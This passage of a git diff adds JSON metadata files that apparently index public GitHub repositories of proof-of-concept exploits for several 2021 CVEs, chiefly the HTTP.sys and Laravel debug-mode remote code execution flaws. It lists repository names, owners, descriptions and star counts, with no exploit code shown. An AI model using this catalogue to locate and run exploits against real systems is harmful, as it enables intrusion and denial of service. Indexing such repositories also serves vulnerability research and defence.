+ "owner": {
+ "login": "zha0gongz1",
+ "id": 41460798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41460798?v=4",
+ "html_url": "https:\/\/github.com\/zha0gongz1"
+ },
+ "html_url": "https:\/\/github.com\/zha0gongz1\/CVE-2021-31166",
+ "description": "PoC for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely. Although it was defined as remote command execution, it can only cause the system to crash.",
+ "fork": false,
+ "created_at": "2021-05-17T11:12:45Z",
+ "updated_at": "2023-09-28T11:27:44Z",
+ "pushed_at": "2021-05-17T11:30:26Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "accept-encoding",
+ "cve-2021-31166",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 368306577,
+ "name": "CVE-2021-31166-detection-rules",
+ "full_name": "mvlnetdev\/CVE-2021-31166-detection-rules",
+ "owner": {
+ "login": "mvlnetdev",
+ "id": 41307333,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41307333?v=4",
+ "html_url": "https:\/\/github.com\/mvlnetdev"
+ },
+ "html_url": "https:\/\/github.com\/mvlnetdev\/CVE-2021-31166-detection-rules",
+ "description": "Different rules to detect if CVE-2021-31166 is being exploited",
+ "fork": false,
+ "created_at": "2021-05-17T19:55:41Z",
+ "updated_at": "2022-07-21T02:50:56Z",
+ "pushed_at": "2022-02-26T12:52:37Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 368350830,
+ "name": "CVE-2021-31166",
+ "full_name": "corelight\/CVE-2021-31166",
+ "owner": {
+ "login": "corelight",
+ "id": 21672558,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4",
+ "html_url": "https:\/\/github.com\/corelight"
+ },
+ "html_url": "https:\/\/github.com\/corelight\/CVE-2021-31166",
+ "description": "HTTP Protocol Stack CVE-2021-31166",
+ "fork": false,
+ "created_at": "2021-05-17T23:54:12Z",
+ "updated_at": "2024-01-16T16:22:34Z",
+ "pushed_at": "2021-05-28T00:41:52Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 368786720,
+ "name": "CVE-2021-31166",
+ "full_name": "zecopro\/CVE-2021-31166",
+ "owner": {
+ "login": "zecopro",
+ "id": 23106986,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23106986?v=4",
+ "html_url": "https:\/\/github.com\/zecopro"
+ },
+ "html_url": "https:\/\/github.com\/zecopro\/CVE-2021-31166",
+ "description": "simple bash script for exploit CVE-2021-31166",
+ "fork": false,
+ "created_at": "2021-05-19T07:50:40Z",
+ "updated_at": "2023-10-11T14:36:15Z",
+ "pushed_at": "2021-05-19T08:18:56Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 370131263,
+ "name": "WIn-CVE-2021-31166",
+ "full_name": "bgsilvait\/WIn-CVE-2021-31166",
+ "owner": {
+ "login": "bgsilvait",
+ "id": 38823062,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38823062?v=4",
+ "html_url": "https:\/\/github.com\/bgsilvait"
+ },
+ "html_url": "https:\/\/github.com\/bgsilvait\/WIn-CVE-2021-31166",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-23T18:41:48Z",
+ "updated_at": "2021-05-23T19:32:43Z",
+ "pushed_at": "2021-05-23T19:32:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 370268982,
+ "name": "CVE-2021-31166",
+ "full_name": "Udyz\/CVE-2021-31166",
+ "owner": {
+ "login": "Udyz",
+ "id": 39673284,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673284?v=4",
+ "html_url": "https:\/\/github.com\/Udyz"
+ },
+ "html_url": "https:\/\/github.com\/Udyz\/CVE-2021-31166",
+ "description": "http.sys remote UAF to Leak Credential",
+ "fork": false,
+ "created_at": "2021-05-24T07:42:18Z",
+ "updated_at": "2023-09-28T11:28:00Z",
+ "pushed_at": "2021-05-25T04:03:31Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 382641118,
+ "name": "CVE-2021-31166-Exploit",
+ "full_name": "y0g3sh-99\/CVE-2021-31166-Exploit",
+ "owner": {
+ "login": "y0g3sh-99",
+ "id": 59962466,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59962466?v=4",
+ "html_url": "https:\/\/github.com\/y0g3sh-99"
+ },
+ "html_url": "https:\/\/github.com\/y0g3sh-99\/CVE-2021-31166-Exploit",
+ "description": "Exploit for MS Http Protocol Stack RCE vulnerability (CVE-2021-31166)",
+ "fork": false,
+ "created_at": "2021-07-03T14:54:59Z",
+ "updated_at": "2022-01-18T13:29:37Z",
+ "pushed_at": "2021-07-03T15:27:28Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "accept-encoding",
+ "cve-2021-31166",
+ "dos",
+ "exploit",
+ "http",
+ "kernel",
+ "python3",
+ "rce",
+ "request-header",
+ "vulnerability",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 410758909,
+ "name": "CVE-2021-31166",
+ "full_name": "antx-code\/CVE-2021-31166",
+ "owner": {
+ "login": "antx-code",
+ "id": 7877940,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7877940?v=4",
+ "html_url": "https:\/\/github.com\/antx-code"
+ },
+ "html_url": "https:\/\/github.com\/antx-code\/CVE-2021-31166",
+ "description": "Windows HTTP协议栈远程代码执行漏洞 CVE-2021-31166",
+ "fork": false,
+ "created_at": "2021-09-27T05:56:45Z",
+ "updated_at": "2023-09-28T11:31:49Z",
+ "pushed_at": "2021-11-04T02:23:11Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 419230261,
+ "name": "CVE-2021-31166-exploit",
+ "full_name": "imikoYa\/CVE-2021-31166-exploit",
+ "owner": {
+ "login": "imikoYa",
+ "id": 92157170,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92157170?v=4",
+ "html_url": "https:\/\/github.com\/imikoYa"
+ },
+ "html_url": "https:\/\/github.com\/imikoYa\/CVE-2021-31166-exploit",
+ "description": "Just a simple CVE-2021-31166 exploit tool",
+ "fork": false,
+ "created_at": "2021-10-20T07:37:46Z",
+ "updated_at": "2023-08-24T06:19:05Z",
+ "pushed_at": "2021-10-20T07:50:52Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 467221883,
+ "name": "CVE-2021-31166",
+ "full_name": "mauricelambert\/CVE-2021-31166",
+ "owner": {
+ "login": "mauricelambert",
+ "id": 50479118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4",
+ "html_url": "https:\/\/github.com\/mauricelambert"
+ },
+ "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2021-31166",
+ "description": "CVE-2021-31166: exploitation with Powershell, Python, Ruby, NMAP and Metasploit.",
+ "fork": false,
+ "created_at": "2022-03-07T18:56:52Z",
+ "updated_at": "2023-04-23T11:13:47Z",
+ "pushed_at": "2022-03-16T21:21:14Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bluescreen",
+ "crash",
+ "cve",
+ "cve-2021-31166",
+ "denial-of-service",
+ "dos",
+ "exploit",
+ "iis",
+ "metasploit",
+ "microsoft",
+ "nmap",
+ "payload",
+ "powershell",
+ "python3",
+ "ruby",
+ "vulnerability",
+ "webserver"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 569183785,
+ "name": "Home-Demolisher",
+ "full_name": "0xmaximus\/Home-Demolisher",
+ "owner": {
+ "login": "0xmaximus",
+ "id": 63053441,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63053441?v=4",
+ "html_url": "https:\/\/github.com\/0xmaximus"
+ },
+ "html_url": "https:\/\/github.com\/0xmaximus\/Home-Demolisher",
+ "description": "PoC for CVE-2021-31166 and CVE-2022-21907",
+ "fork": false,
+ "created_at": "2022-11-22T09:10:36Z",
+ "updated_at": "2024-01-13T10:43:03Z",
+ "pushed_at": "2022-12-08T11:05:50Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31184.json b/2021/CVE-2021-31184.json
new file mode 100644
index 0000000000..1a29bb1e9f
--- /dev/null
+++ b/2021/CVE-2021-31184.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 366469517,
+ "name": "CVE-2021-31184",
+ "full_name": "waleedassar\/CVE-2021-31184",
+ "owner": {
+ "login": "waleedassar",
+ "id": 5983995,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5983995?v=4",
+ "html_url": "https:\/\/github.com\/waleedassar"
+ },
+ "html_url": "https:\/\/github.com\/waleedassar\/CVE-2021-31184",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-11T17:52:22Z",
+ "updated_at": "2023-09-28T11:27:35Z",
+ "pushed_at": "2021-05-11T17:57:10Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3122.json b/2021/CVE-2021-3122.json
new file mode 100644
index 0000000000..2e00693edd
--- /dev/null
+++ b/2021/CVE-2021-3122.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 336828311,
+ "name": "CVE-2021-3122-Details",
+ "full_name": "acquiredsecurity\/CVE-2021-3122-Details",
+ "owner": {
+ "login": "acquiredsecurity",
+ "id": 30843972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30843972?v=4",
+ "html_url": "https:\/\/github.com\/acquiredsecurity"
+ },
+ "html_url": "https:\/\/github.com\/acquiredsecurity\/CVE-2021-3122-Details",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-07T16:05:49Z",
+ "updated_at": "2024-04-09T22:06:28Z",
+ "pushed_at": "2022-11-01T13:52:22Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31233.json b/2021/CVE-2021-31233.json
new file mode 100644
index 0000000000..6dca0840b7
--- /dev/null
+++ b/2021/CVE-2021-31233.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 646876751,
+ "name": "CVE-2021-31233",
+ "full_name": "gabesolomon\/CVE-2021-31233",
+ "owner": {
+ "login": "gabesolomon",
+ "id": 106892722,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106892722?v=4",
+ "html_url": "https:\/\/github.com\/gabesolomon"
+ },
+ "html_url": "https:\/\/github.com\/gabesolomon\/CVE-2021-31233",
+ "description": "SQL Injection vulnerability found in Fighting Cock Information System v1.0 allows a remote attacker to obtain sensitive information via the edit_breed.php parameter",
+ "fork": false,
+ "created_at": "2023-05-29T14:38:58Z",
+ "updated_at": "2023-11-04T17:00:33Z",
+ "pushed_at": "2023-05-29T15:21:38Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3129.json b/2021/CVE-2021-3129.json
new file mode 100644
index 0000000000..a0907e5743
--- /dev/null
+++ b/2021/CVE-2021-3129.json
@@ -0,0 +1,801 @@
+[
+ {
+ "id": 329307363,
+ "name": "laravel-exploits",
+ "full_name": "ambionics\/laravel-exploits",
+ "owner": {
+ "login": "ambionics",
+ "id": 29630660,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29630660?v=4",
+ "html_url": "https:\/\/github.com\/ambionics"
+ },
+ "html_url": "https:\/\/github.com\/ambionics\/laravel-exploits",
+ "description": "Exploit for CVE-2021-3129",
+ "fork": false,
+ "created_at": "2021-01-13T12:52:20Z",
+ "updated_at": "2024-06-21T01:23:30Z",
+ "pushed_at": "2021-01-29T13:59:07Z",
+ "stargazers_count": 263,
+ "watchers_count": 263,
+ "has_discussions": false,
+ "forks_count": 68,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 68,
+ "watchers": 263,
+ "score": 0,
+ "subscribers_count": 14
+ },
+ {
+ "id": 331843308,
+ "name": "CVE-2021-3129",
+ "full_name": "SNCKER\/CVE-2021-3129",
+ "owner": {
+ "login": "SNCKER",
+ "id": 49559334,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49559334?v=4",
+ "html_url": "https:\/\/github.com\/SNCKER"
+ },
+ "html_url": "https:\/\/github.com\/SNCKER\/CVE-2021-3129",
+ "description": "Laravel debug rce",
+ "fork": false,
+ "created_at": "2021-01-22T05:12:21Z",
+ "updated_at": "2024-01-31T15:16:02Z",
+ "pushed_at": "2021-01-24T05:28:07Z",
+ "stargazers_count": 122,
+ "watchers_count": 122,
+ "has_discussions": false,
+ "forks_count": 49,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 49,
+ "watchers": 122,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 332682252,
+ "name": "laravel-CVE-2021-3129-EXP",
+ "full_name": "SecPros-Team\/laravel-CVE-2021-3129-EXP",
+ "owner": {
+ "login": "SecPros-Team",
+ "id": 77960183,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77960183?v=4",
+ "html_url": "https:\/\/github.com\/SecPros-Team"
+ },
+ "html_url": "https:\/\/github.com\/SecPros-Team\/laravel-CVE-2021-3129-EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-25T08:42:28Z",
+ "updated_at": "2024-06-22T13:22:37Z",
+ "pushed_at": "2021-01-25T08:49:59Z",
+ "stargazers_count": 71,
+ "watchers_count": 71,
+ "has_discussions": false,
+ "forks_count": 32,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 32,
+ "watchers": 71,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 333316985,
+ "name": "Laravel_CVE-2021-3129_EXP",
+ "full_name": "crisprss\/Laravel_CVE-2021-3129_EXP",
+ "owner": {
+ "login": "crisprss",
+ "id": 55953931,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55953931?v=4",
+ "html_url": "https:\/\/github.com\/crisprss"
+ },
+ "html_url": "https:\/\/github.com\/crisprss\/Laravel_CVE-2021-3129_EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-27T05:44:52Z",
+ "updated_at": "2023-12-27T07:40:53Z",
+ "pushed_at": "2021-01-27T06:23:34Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 333380316,
+ "name": "CVE-2021-3129_exploit",
+ "full_name": "nth347\/CVE-2021-3129_exploit",
+ "owner": {
+ "login": "nth347",
+ "id": 20441996,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4",
+ "html_url": "https:\/\/github.com\/nth347"
+ },
+ "html_url": "https:\/\/github.com\/nth347\/CVE-2021-3129_exploit",
+ "description": "Exploit for CVE-2021-3129",
+ "fork": false,
+ "created_at": "2021-01-27T10:16:35Z",
+ "updated_at": "2024-04-14T08:29:41Z",
+ "pushed_at": "2021-03-07T04:39:58Z",
+ "stargazers_count": 64,
+ "watchers_count": 64,
+ "has_discussions": false,
+ "forks_count": 28,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "laravel",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 28,
+ "watchers": 64,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 338768882,
+ "name": "Laravel-8.4.2-rce-CVE-2021-3129",
+ "full_name": "FunPhishing\/Laravel-8.4.2-rce-CVE-2021-3129",
+ "owner": {
+ "login": "FunPhishing",
+ "id": 77312720,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77312720?v=4",
+ "html_url": "https:\/\/github.com\/FunPhishing"
+ },
+ "html_url": "https:\/\/github.com\/FunPhishing\/Laravel-8.4.2-rce-CVE-2021-3129",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-14T09:24:07Z",
+ "updated_at": "2023-09-28T11:24:57Z",
+ "pushed_at": "2021-02-14T12:27:54Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 339947921,
+ "name": "CVE-2021-3129",
+ "full_name": "zhzyker\/CVE-2021-3129",
+ "owner": {
+ "login": "zhzyker",
+ "id": 32918050,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4",
+ "html_url": "https:\/\/github.com\/zhzyker"
+ },
+ "html_url": "https:\/\/github.com\/zhzyker\/CVE-2021-3129",
+ "description": "Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)",
+ "fork": false,
+ "created_at": "2021-02-18T05:42:13Z",
+ "updated_at": "2024-06-22T15:46:24Z",
+ "pushed_at": "2021-12-14T05:12:17Z",
+ "stargazers_count": 140,
+ "watchers_count": 140,
+ "has_discussions": false,
+ "forks_count": 62,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 62,
+ "watchers": 140,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 340833719,
+ "name": "CVE-2021-3129",
+ "full_name": "simonlee-hello\/CVE-2021-3129",
+ "owner": {
+ "login": "simonlee-hello",
+ "id": 56343277,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56343277?v=4",
+ "html_url": "https:\/\/github.com\/simonlee-hello"
+ },
+ "html_url": "https:\/\/github.com\/simonlee-hello\/CVE-2021-3129",
+ "description": "CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞",
+ "fork": false,
+ "created_at": "2021-02-21T06:27:18Z",
+ "updated_at": "2024-04-14T08:16:56Z",
+ "pushed_at": "2021-11-23T07:22:19Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 388370396,
+ "name": "laravel-CVE-2021-3129-EXP",
+ "full_name": "idea-oss\/laravel-CVE-2021-3129-EXP",
+ "owner": {
+ "login": "idea-oss",
+ "id": 79071420,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79071420?v=4",
+ "html_url": "https:\/\/github.com\/idea-oss"
+ },
+ "html_url": "https:\/\/github.com\/idea-oss\/laravel-CVE-2021-3129-EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-22T07:35:04Z",
+ "updated_at": "2023-09-28T11:29:43Z",
+ "pushed_at": "2021-07-22T09:18:27Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 412400011,
+ "name": "CVE-2021-3129",
+ "full_name": "knqyf263\/CVE-2021-3129",
+ "owner": {
+ "login": "knqyf263",
+ "id": 2253692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4",
+ "html_url": "https:\/\/github.com\/knqyf263"
+ },
+ "html_url": "https:\/\/github.com\/knqyf263\/CVE-2021-3129",
+ "description": "PoC for CVE-2021-3129 (Laravel)",
+ "fork": false,
+ "created_at": "2021-10-01T09:09:38Z",
+ "updated_at": "2024-06-13T16:26:22Z",
+ "pushed_at": "2021-10-09T09:37:05Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 479273150,
+ "name": "CVE-2021-3129-Script",
+ "full_name": "cuongtop4598\/CVE-2021-3129-Script",
+ "owner": {
+ "login": "cuongtop4598",
+ "id": 52173058,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52173058?v=4",
+ "html_url": "https:\/\/github.com\/cuongtop4598"
+ },
+ "html_url": "https:\/\/github.com\/cuongtop4598\/CVE-2021-3129-Script",
+ "description": "Add revert shell ",
+ "fork": false,
+ "created_at": "2022-04-08T06:34:17Z",
+ "updated_at": "2023-09-09T04:21:08Z",
+ "pushed_at": "2022-04-08T06:59:38Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 482317429,
+ "name": "CVE-2021-3129",
+ "full_name": "joshuavanderpoll\/CVE-2021-3129",
+ "owner": {
+ "login": "joshuavanderpoll",
+ "id": 16516497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16516497?v=4",
+ "html_url": "https:\/\/github.com\/joshuavanderpoll"
+ },
+ "html_url": "https:\/\/github.com\/joshuavanderpoll\/CVE-2021-3129",
+ "description": "Laravel RCE (CVE-2021-3129)",
+ "fork": false,
+ "created_at": "2022-04-16T17:22:55Z",
+ "updated_at": "2024-06-15T15:37:49Z",
+ "pushed_at": "2023-11-22T09:28:49Z",
+ "stargazers_count": 71,
+ "watchers_count": 71,
+ "has_discussions": false,
+ "forks_count": 18,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-3129",
+ "exploit",
+ "laravel",
+ "python",
+ "scanner",
+ "security-tools",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 18,
+ "watchers": 71,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 499800049,
+ "name": "Laravel-CVE-2021-3129",
+ "full_name": "shadowabi\/Laravel-CVE-2021-3129",
+ "owner": {
+ "login": "shadowabi",
+ "id": 50265741,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50265741?v=4",
+ "html_url": "https:\/\/github.com\/shadowabi"
+ },
+ "html_url": "https:\/\/github.com\/shadowabi\/Laravel-CVE-2021-3129",
+ "description": "CVE-2021-3129 POC",
+ "fork": false,
+ "created_at": "2022-06-04T10:58:47Z",
+ "updated_at": "2023-04-21T05:37:04Z",
+ "pushed_at": "2022-09-29T04:02:11Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 532298573,
+ "name": "CVE-2021-3129",
+ "full_name": "JacobEbben\/CVE-2021-3129",
+ "owner": {
+ "login": "JacobEbben",
+ "id": 112503338,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4",
+ "html_url": "https:\/\/github.com\/JacobEbben"
+ },
+ "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2021-3129",
+ "description": "Unauthenticated RCE in Laravel Debug Mode <8.4.2",
+ "fork": false,
+ "created_at": "2022-09-03T15:25:35Z",
+ "updated_at": "2024-03-11T03:48:18Z",
+ "pushed_at": "2022-09-03T17:22:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 543723972,
+ "name": "CVE-2021-3129",
+ "full_name": "hupe1980\/CVE-2021-3129",
+ "owner": {
+ "login": "hupe1980",
+ "id": 24973437,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4",
+ "html_url": "https:\/\/github.com\/hupe1980"
+ },
+ "html_url": "https:\/\/github.com\/hupe1980\/CVE-2021-3129",
+ "description": "Laravel debug mode - Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2022-09-30T17:54:17Z",
+ "updated_at": "2022-09-30T21:03:46Z",
+ "pushed_at": "2022-09-30T21:02:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3129",
+ "laravel"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 549483301,
+ "name": "CVE-2021-3129",
+ "full_name": "0nion1\/CVE-2021-3129",
+ "owner": {
+ "login": "0nion1",
+ "id": 53221874,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53221874?v=4",
+ "html_url": "https:\/\/github.com\/0nion1"
+ },
+ "html_url": "https:\/\/github.com\/0nion1\/CVE-2021-3129",
+ "description": "CVE-2021-3129-Laravel Debug mode",
+ "fork": false,
+ "created_at": "2022-10-11T08:53:05Z",
+ "updated_at": "2024-05-29T04:42:58Z",
+ "pushed_at": "2022-10-11T08:57:34Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
